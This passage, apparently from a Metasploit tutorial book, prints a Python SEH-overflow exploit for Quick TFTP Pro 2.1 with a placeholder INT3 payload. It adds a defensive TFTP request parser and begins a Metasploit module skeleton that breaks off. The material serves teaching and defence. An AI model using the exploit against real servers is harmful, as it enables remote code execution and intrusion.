Porting Exploits to the Metasploit Framework
import socket
import sys

print "[*] Quick TFTP Pro 2.1 SEH Overflow (0day)"
print "[*] http://www.offensive-security.com"

host = '127.0.0.1'
port = 69

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed"
    sys.exit(1)

filename = "pwnd"
shell = "\xcc" * 317   # placeholder payload: INT3 breakpoints, not a working shell

# Oversized mode field: 1019 bytes of padding, then the nSEH/SEH record,
# a short NOP sled and the payload
mode = "A"*1019+"\xeb\x08\x90\x90"+"\x58\x14\xd3\x74"+"\x90"*16+shell

# TFTP write request (opcode 2): filename and mode as NUL-terminated strings
muha = "\x00\x02" + filename+ "\0" + mode + "\0"

print "[*] Sending evil packet, ph33r"
s.sendto(muha, (host, port))
print "[*] Check port 4444 for bindshell"
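The packet assembled in `muha` above is an RFC 1350 write request (WRQ) whose mode field is far longer than any legitimate transfer mode, which is the condition the vulnerable server fails to check. As an added example, not part of the book's or the original exploit's code, the following parser shows what a hardened TFTP server or a network sensor would check before accepting such a request; the opcodes and mode names come from RFC 1350, while the filename length limit and the sample packets are constructed assumptions.

```python
import struct

TFTP_RRQ, TFTP_WRQ = 1, 2                       # RFC 1350 request opcodes
VALID_MODES = {b"netascii", b"octet", b"mail"}  # the only modes RFC 1350 defines
MAX_FILENAME = 255                              # assumed local policy, not a TFTP limit


def parse_tftp_request(pkt):
    """Split a TFTP RRQ/WRQ into (opcode, filename, mode, trailing).
    Both strings are NUL-terminated (RFC 1350 section 5); anything after
    the mode terminator is returned separately so callers can flag it."""
    if len(pkt) < 2:
        raise ValueError("packet shorter than an opcode")
    opcode = struct.unpack("!H", pkt[:2])[0]
    if opcode not in (TFTP_RRQ, TFTP_WRQ):
        raise ValueError("opcode %d is not a read/write request" % opcode)
    filename, sep, rest = pkt[2:].partition(b"\x00")
    if not sep:
        raise ValueError("filename not NUL-terminated")
    mode, sep, trailing = rest.partition(b"\x00")
    if not sep:
        raise ValueError("mode not NUL-terminated")
    return opcode, filename, mode, trailing


def inspect_tftp_request(pkt):
    """Return a list of findings; an empty list means the request looks benign."""
    try:
        _opcode, filename, mode, trailing = parse_tftp_request(pkt)
    except ValueError as err:
        return ["malformed request: %s" % err]
    findings = []
    if mode.lower() not in VALID_MODES:
        # An over-long, unknown mode string is exactly what triggers the
        # Quick TFTP Pro overflow; report its length for the analyst.
        findings.append("unknown mode, %d bytes long" % len(mode))
    if len(filename) > MAX_FILENAME:
        findings.append("filename exceeds %d bytes" % MAX_FILENAME)
    if any(b < 0x20 or b > 0x7e for b in filename + mode):
        findings.append("non-printable bytes in string fields")
    if trailing:
        findings.append("%d bytes after the mode terminator" % len(trailing))
    return findings


# Constructed sample packets (not captured traffic).
BENIGN_RRQ = b"\x00\x01" + b"boot.cfg\x00" + b"octet\x00"
LONG_MODE_WRQ = b"\x00\x02" + b"pwnd\x00" + b"A" * 1360 + b"\x00"

if __name__ == "__main__":
    for name, pkt in (("benign", BENIGN_RRQ), ("long mode", LONG_MODE_WRQ)):
        print(name, inspect_tftp_request(pkt) or "ok")
```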
As we did with our previous JMP ESP example, we first create a skeleton for
our new module by using a base example of an exploit similar to the one we used
previously:
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Quick TFTP Pro 2.1 Long Mode Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack overflow in Quick TFTP Pro 2.1.
      },
      'Author'         => 'Your Name',
      'Version'        => '$Revision: 7724 $',
      'References'     =>
        [
          ['CVE', '2008-1610'],
          ['OSVDB', '43784'],
          ['URL', 'http://www.exploit-db.com/exploits/5315'],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },